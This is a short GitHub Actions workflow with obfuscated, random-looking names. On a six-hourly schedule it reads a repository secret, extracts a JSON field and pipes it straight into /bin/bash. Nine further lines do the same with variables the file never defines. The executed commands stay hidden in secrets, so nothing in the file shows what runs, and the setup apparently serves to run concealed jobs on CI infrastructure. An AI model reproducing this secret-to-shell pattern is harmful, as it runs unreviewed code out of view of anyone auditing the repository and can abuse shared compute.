name: xuguoqiang3456
on:
  workflow_dispatch:
  schedule:
    - cron: '9 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xuguoqiang3456
        env:
          xg92: ${{ secrets.xg92 }}
        run: |
          echo $xg92 | jq -r .l649 | /bin/bash
          echo $qc7514 | jq -r .r3758 | /bin/bash
          echo $qy42 | jq -r .lglri4680 | /bin/bash
          echo $lskez89958 | jq -r .hmw68 | /bin/bash
          echo $zyms7 | jq -r .nuocb8 | /bin/bash
          echo $vb775 | jq -r .lsy731 | /bin/bash
          echo $c1668 | jq -r .j1124 | /bin/bash
          echo $kzia8535 | jq -r .glx89667 | /bin/bash
          echo $tjjnk20689 | jq -r .v2 | /bin/bash
          echo $rwdl3 | jq -r .bmf0487 | /bin/bash

